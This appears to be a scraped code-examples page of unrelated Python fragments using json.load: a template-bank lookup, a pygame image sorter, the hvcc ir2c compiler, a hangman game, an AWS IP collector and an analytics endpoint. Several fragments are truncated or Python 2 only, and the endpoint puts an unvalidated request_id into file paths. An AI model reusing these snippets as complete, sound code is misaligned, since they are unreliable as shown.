LINKS_BY_CATEGORY_ROUTE = CONFIG.get(
    'routes', {}).get('links', {}).get('by_category')
LINKS_BY_SEARCH_ROUTE = CONFIG.get(
    'routes', {}).get('links', {}).get('by_pattern')
LINKS_UPDATE_CATEGORY = CONFIG.get(
    'routes', {}).get('links', {}).get('update_category')
LINKS_BY_USER_ID = CONFIG.get(
コード例 #52
0
            # Find the value in the sorted overlaps which divides the indexes
            # to overlap values less or greater than the value
            tidx = bisect.bisect(self._odata[idx][sort_idx], thresh)
            return self._odata[idx][sort_idx][-tidx:]
        #return self._odata[idx][sort_idx][-npts:]
        return sort_idx[-npts:]

    def intr_prms_from_idx(self, idx):
        return self._intr_info[idx]

tree = OverlapLookup(5762)

# If asked, retrieve bank overlap
if opts.use_overlap is not None:
    with open(opts.use_overlap) as fin:
        overlap_toc = json.load(fin)["types"]
    # Just get the first type...
    overlap_toc = overlap_toc[overlap_toc.keys()[0]]

    # FIXME:
    bpath = os.path.dirname(opts.use_overlap)
    overlap = {}
    for idx, info in enumerate(overlap_toc):
        print os.path.join(bpath, info["filename"])
        with open(os.path.join(bpath, info["filename"])) as ovrlpfile:
            contents = json.load(ovrlpfile)
            overlap[idx] = numpy.array(contents["overlap"])
            tree.add_overlap_row(idx, (info["mass1"], info["mass2"]), numpy.array(contents["overlap"]))

tree.query(0, 1)
# TODO: Map an input point onto the template bank intrinsic space
コード例 #53
0
tkey = {i0:0, i1:0, i2:0, i3:0, i4:0, i5:0, i6:0, i7:0, i8:0, i9:0, a:0, b:0, c:0, d:0, e:0, f:0, g:0, h:0, i:0, j:0, k:0, l:0, m:0, n:0, o:0, p:0, q:0, r:0, s:0, t:0, u:0, v:0, w:0, x:0, y:0, z:0, bk:0, sp:0, tb:0, esc:0, sh:0, enter:0, bq:0, min:0, plus:0, lbra:0, rbra:0, bckslsh:0, semi:0, quote:0, comma:0, period:0, slash:0, F11:0}
tkey_v = {i0:0, i1:0, i2:0, i3:0, i4:0, i5:0, i6:0, i7:0, i8:0, i9:0, a:0, b:0, c:0, d:0, e:0, f:0, g:0, h:0, i:0, j:0, k:0, l:0, m:0, n:0, o:0, p:0, q:0, r:0, s:0, t:0, u:0, v:0, w:0, x:0, y:0, z:0, bk:0, sp:0, tb:0, esc:0, sh:0, enter:0, bq:0, min:0, plus:0, lbra:0, rbra:0, bckslsh:0, semi:0, quote:0, comma:0, period:0, slash:0, F11:0}
nkey = {i0:0, i1:0, i2:0, i3:0, i4:0, i5:0, i6:0, i7:0, i8:0, i9:0, a:0, b:0, c:0, d:0, e:0, f:0, g:0, h:0, i:0, j:0, k:0, l:0, m:0, n:0, o:0, p:0, q:0, r:0, s:0, t:0, u:0, v:0, w:0, x:0, y:0, z:0, bk:0, sp:0, tb:0, esc:0, sh:0, enter:0, bq:0, min:0, plus:0, lbra:0, rbra:0, bckslsh:0, semi:0, quote:0, comma:0, period:0, slash:0, F11:0}

from Structure.Disarray_Classes import *
from Structure.Disarray_Modes import *

Unsorted_Images = []
for this in os.listdir():
    if this[-4:] == ".jpg" or this[-4:] == ".png":
        Unsorted_Images.append(this)

importables = {}
for this in importables:
    with open('Data/' + this + '.json', 'r') as file:
        importables[this].update(json.load(file))

mode_func_dict = {'Quit': Quit_func, 'Add_New': Add_New_func, 'Menu': pass_func2}

Toolbar_Assets_dict = {'Toolbar.png':[0, 0, 10], 'Question_Block.png':[15, 0, 10.1]}
Toolbar_Assets = []
for this in os.listdir('Toolbar/Toolbar_Assets/'):
    Toolbar_Asset = Image(this, 'Toolbar/Toolbar_Assets/', Toolbar_Assets_dict[this][0], Toolbar_Assets_dict[this][1]); Toolbar_Asset.Layer = Toolbar_Assets_dict[this][2]
    Toolbar_Assets.append(Toolbar_Asset)

Bgr = 0; Bgg = 0; Bgb = 0; mouse_visible = 1; mode = "Menu"; toolbar_show = 1; help_show = 1; New_Image = Image(None, '', 0, 0); Images = []; screenlist = [(0, 0), pg.FULLSCREEN]; screenlist_v = [(screen.get_width(), screen.get_height()), pg.RESIZABLE]
running = 1
while running:
    if not screenlist == screenlist_v: screen = pg.display.set_mode(*screenlist)
    screenlist_v = screenlist
    mouse_x, mouse_y = pg.mouse.get_pos()
コード例 #54
0
ファイル: ir2c.py プロジェクト: graingert/hvcc
    def compile(clazz, hv_ir_path, static_dir, output_dir, externs, copyright=None):
        """ Compiles a HeavyIR file into a C.
            Returns a tuple of compile time in seconds, a notification dictionary,
            and a HeavyIR object counter.
        """

        # keep track of the total compile time
        tick = time.time()

        # establish the jinja environment
        env = jinja2.Environment()
        env.filters["hvhash"] = ir2c.filter_hvhash
        env.filters["extern"] = ir2c.filter_extern
        env.loader = jinja2.FileSystemLoader(
            os.path.join(os.path.dirname(__file__), "templates"))

        # read the hv.ir.json file
        with open(hv_ir_path, "r") as f:
            ir = json.load(f)

        # generate the copyright
        copyright = copyright_manager.get_copyright_for_c(copyright)


        #
        # Parse the hv.ir data structure and generate C-language strings.
        #

        # generate set of header files to include
        include_set = set([x for o in ir["objects"].values() for x in ir2c.get_class(o["type"]).get_C_header_set()])

        # generate set of files to add to project
        file_set = set([x for o in ir["objects"].values() for x in ir2c.get_class(o["type"]).get_C_file_set()])
        file_set.update(ir2c.__BASE_FILE_SET)

        # generate object definition and initialisation list
        init_list = []
        free_list = []
        def_list = []
        decl_list = []
        for obj_id in ir["init"]["order"]:
            o = ir["objects"][obj_id]
            obj_class = ir2c.get_class(o["type"])
            init_list.extend(obj_class.get_C_init(o["type"], obj_id, o["args"]))
            def_list.extend(obj_class.get_C_def(o["type"], obj_id))
            free_list.extend(obj_class.get_C_free(o["type"], obj_id, o["args"]))

        impl_list = []
        for x in ir["control"]["sendMessage"]:
            obj_id = x["id"]
            o = ir["objects"][obj_id]
            obj_class = ir2c.get_class(o["type"])
            impl = obj_class.get_C_impl(
                o["type"],
                obj_id,
                x["onMessage"],
                ir2c.get_class,
                ir["objects"])
            impl_list.append("\n".join(PrettyfyC.prettyfy_list(impl)))
            decl_list.extend(obj_class.get_C_decl(o["type"], obj_id, o["args"]))

        # generate static table data initialisers
        table_data_list = []
        for k, v in ir["tables"].items():
            o = ir["objects"][v["id"]]
            obj_class = ir2c.get_class(o["type"])
            table_data_list.extend(obj_class.get_table_data_decl(
                o["type"],
                v["id"],
                o["args"]))

        # generate the list of functions to process
        process_list = []
        for x in ir["signal"]["processOrder"]:
            obj_id = x["id"]
            o = ir["objects"][obj_id]
            process_list.extend(ir2c.get_class(o["type"]).get_C_process(
                o["type"],
                x,
                ir["objects"][obj_id]["args"]))



        #
        # Load the C-language template files and use the parsed strings to fill them in.
        #

        # make the output directory if necessary
        if not os.path.exists(output_dir):
            os.makedirs(output_dir)

        # the project name to be used as a part of file and function names
        name = ir["name"]["escaped"]

        # ensure that send_receive dictionary is alphabetised by the receiver key
        send_receive = OrderedDict(sorted([(k,v) for k,v in ir["control"]["receivers"].items()], key=lambda x: x[0]))

        # write HeavyContext.h
        with open(os.path.join(output_dir, "Heavy_{0}.hpp".format(name)), "w") as f:
            f.write(env.get_template("Heavy_NAME.hpp").render(
                name=name,
                include_set=include_set,
                decl_list=decl_list,
                def_list=def_list,
                signal=ir["signal"],
                copyright=copyright,
                externs=externs))

        # write C++ implementation
        with open(os.path.join(output_dir, "Heavy_{0}.cpp".format(name)), "w") as f:
            f.write(env.get_template("Heavy_NAME.cpp").render(
                name=name,
                signal=ir["signal"],
                init_list=init_list,
                free_list=free_list,
                impl_list=impl_list,
                send_receive=send_receive,
                send_table=ir["tables"],
                process_list=process_list,
                table_data_list=table_data_list,
                copyright=copyright))

        # write C API, hv_NAME.h
        with open(os.path.join(output_dir, "Heavy_{0}.h".format(name)), "w") as f:
            f.write(env.get_template("Heavy_NAME.h").render(
                name=name,
                copyright=copyright,
                externs=externs))

        # copy static files to output directory
        for f in file_set:
            shutil.copy2(
                src=os.path.join(static_dir, f),
                dst=os.path.join(output_dir, f))

        # generate HeavyIR object counter
        ir_counter = Counter([obj["type"] for obj in ir["objects"].values()])

        return {
            "stage": "ir2c",
            "notifs": {
                "has_error": False,
                "exception": None,
                "errors": []
            },
            "in_dir": os.path.dirname(hv_ir_path),
            "in_file": os.path.basename(hv_ir_path),
            "out_dir": output_dir,
            "out_file": "",
            "compile_time": (time.time() - tick),
            "obj_counter": ir_counter
        }
コード例 #55
0
 def get(self):
     path = os.path.join(server_path, "analytics.json")
     fp = open(path, "r")
     analytics = json.load(fp)
     fp.close()
     return analytics
コード例 #56
0
def main():
    with open('animal.json') as f:
        data = json.load(f)
    #print(data)

    # animalList=['Tiger','Monkey','Bat','Donkey','Bear']
    name = random.choice(data)
    count = 8
    print('###############################################')
    print('             WELCOME TO HANGMAN                ')
    print('###############################################')
    print('\n\n\n')
    print('Category : Animals')
    l = {}

    for i in name:
        l[i] = 0

    attempt = []
    char = ' '
    flag = False
    status = False
    for i in l:
        if (l[i] == 0):
            print('-', end='')
    print('')

    print('Enter character of animal')
    while (count > 0 and status == False):
        flag = False
        print('\nEnter character :', end='')
        char = str(input())
        for i in l:
            if (i.lower() == char.lower() and l[i] != 1):
                l[i] = 1
                flag = True

        if (flag == False):
            attempt.append(char)
            count = count - 1

        for i in l:
            if (l[i] == 0):
                print('-', end='')
            else:
                print(i, end='')

        print('\nMissed :')

        for i in attempt:
            print(i, ' ', end='')
        print()

        print('Chances remaining :', count)
        status = True
        for i in l:
            if (l[i] == 0):
                status = False

        hangman(count)

    if (status == True):
        print('You won!!!!!!!!!!!!!!!!')
    else:
        print('You ran out of chances !!\nAnimal was :')
        for i in l:
            print(i, end='')

    print()
コード例 #57
0
def read_json(path):
    with open(path, 'r') as file:
        data = json.load(file)
    return data
コード例 #58
0
                    column_name = column_name[column_name.
                                              find(str(previous_key)) +
                                              len(str(previous_key)) + 1:]
                print(column_name)
                master_list.append(str(column_name))
                column_name = column_name[:column_name.rfind(str(index)) - 1]
                # print( "Count: {}, Previous Key: {}".format( count, previous_key ) )
                # return list_or_dict[index]
                print("Value found")

                # time.sleep(0.7)


with open("./resources/Reports/report.json", 'r') as json_report_file:

    json_report_dict = json.load(json_report_file)
    # # print( json.dumps(json_report_dict["info"], indent=4) )
    # json_report_dict_normalize = json_normalize( json_report_dict )

    # for column in json_report_dict_normalize.columns:
    #     print("\nName of Colums: ", column)
    # print( json_report_dict_normalize )

    # for key in json_report_dict.keys():

    nested_element = dict_or_list2(json_report_dict,
                                   json_report_dict,
                                   previous_key="")
    # print(nested_element)
    # print(nested_element, end = '')
コード例 #59
0
def collect_ips(file_name):
    output_json = json.load(open(file_name))

    for entry in output_json:
        print_header(entry['title'])

        external_hostnames_key = 'external_hostnames'
        if entry.has_key(external_hostnames_key):
            external_hostnames = entry[external_hostnames_key]
            for hostname in external_hostnames:
                print_line_item(hostname, get_ip_for_hostname(hostname))

        ec2_instance_name_tags_key = 'ec2_instance_name_tags'
        if entry.has_key(ec2_instance_name_tags_key):
            ec2_name_tags = entry[ec2_instance_name_tags_key]
            for pair in ec2_name_tags:
                display_name = pair['display_name']
                aws_tag_name = pair['aws_tag_name']
                ip = get_instance_ip_by_name_tag(aws_tag_name)
                print_line_item(display_name, ip)

        ec2_elb_name_tags_key = 'ec2_elb_name_tags'
        if entry.has_key(ec2_elb_name_tags_key):
            ec2_elb_name_tags = entry[ec2_elb_name_tags_key]
            for pair in ec2_elb_name_tags:
                display_name = pair['display_name']
                elb_name = pair['elb_name']
                ip = get_elb_ip_by_elb_name(elb_name)
                print_line_item(display_name, ip)

        elasticache_clusters_key = 'elasticache_clusters'
        if entry.has_key(elasticache_clusters_key):
            elasticache_clusters = entry[elasticache_clusters_key]
            for cluster in elasticache_clusters:
                display_name = cluster['display_name']
                cluster_id = cluster['cluster_id']
                print_line_item(display_name,
                                get_elasticache_ip_by_cluster_id(cluster_id))

        rds_instances_key = 'rds_instances'
        if entry.has_key(rds_instances_key):
            rds_instances = entry[rds_instances_key]
            for instance in rds_instances:
                display_name = instance['display_name']
                instance_id = None
                if instance.has_key('instance_id'):
                    instance_id = instance['instance_id']
                    print_line_item(display_name,
                                    get_rds_ip_by_instance_id(instance_id))
                elif instance.has_key('cluster_id'):
                    cluster_id = instance['cluster_id']
                    instance_id = get_writer_instance_id_by_cluster_id(
                        cluster_id)
                    print_line_item(display_name,
                                    get_rds_ip_by_instance_id(instance_id))
                else:
                    raise ValueError(
                        'Cant locate RDS instance without instance_id or cluster_id'
                    )

        static_entries_key = 'static_entries'
        if entry.has_key(static_entries_key):
            static_entries = entry[static_entries_key]
            for item in static_entries:
                display_name = item['display_name']
                display_value = item['display_value']
                print_line_item(display_name, display_value)
コード例 #60
0
    def post(self):
        try:
            parser = reqparse.RequestParser()
            parser.add_argument('analytic_name',
                                type=str,
                                location="json",
                                required=True)
            parser.add_argument('method',
                                type=str,
                                location="json",
                                required=True)
            parser.add_argument('request_id',
                                type=str,
                                location="json",
                                required=True)
            args = parser.parse_args()
            path = server_path + "/" + args.get(
                "request_id") + "/" + "preprocess"
            file = os.listdir(path)
            df = pandas.read_csv(path + "/" + file[0])
            module_name = "analytics." + args.get('analytic_name')
            module = importlib.import_module(module_name)
            analytic_class = getattr(module, args.get("analytic_name"))
            if args.get("method") == "train":
                result = analytic_class.train(df)
                if result["status"] == "success":

                    path = server_path + "/" + args.get(
                        "request_id") + "/" + args.get("analytic_name")
                    if os.path.exists(path):
                        pass
                    else:
                        os.mkdir(path)
                    file_name = os.path.join(path, "model.json")
                    fp = open(file_name, "w")
                    json.dump(result, fp)
                    fp.close()
                return result

            elif args.get("method") == "score":
                path = server_path + "/" + args.get(
                    "request_id") + "/" + args.get("analytic_name")
                model_file = os.path.join(path, "model.json")
                fp = open(model_file, "r")
                dct_model = json.load(fp)
                fp.close()
                result, df_out, error = analytic_class.score(
                    df, dct_model["coeff"])
                if result == "success":

                    if os.path.exists(path):
                        pass
                    else:
                        os.mkdir(path)
                    file_name = os.path.join(path, "output.csv")
                    df_out.to_csv(file_name, index=False)
                    return {"status": "success"}
                else:
                    return {"status": "failed", "error": error}
        except Exception as e:
            return {"status": "failed", "error": str(e)}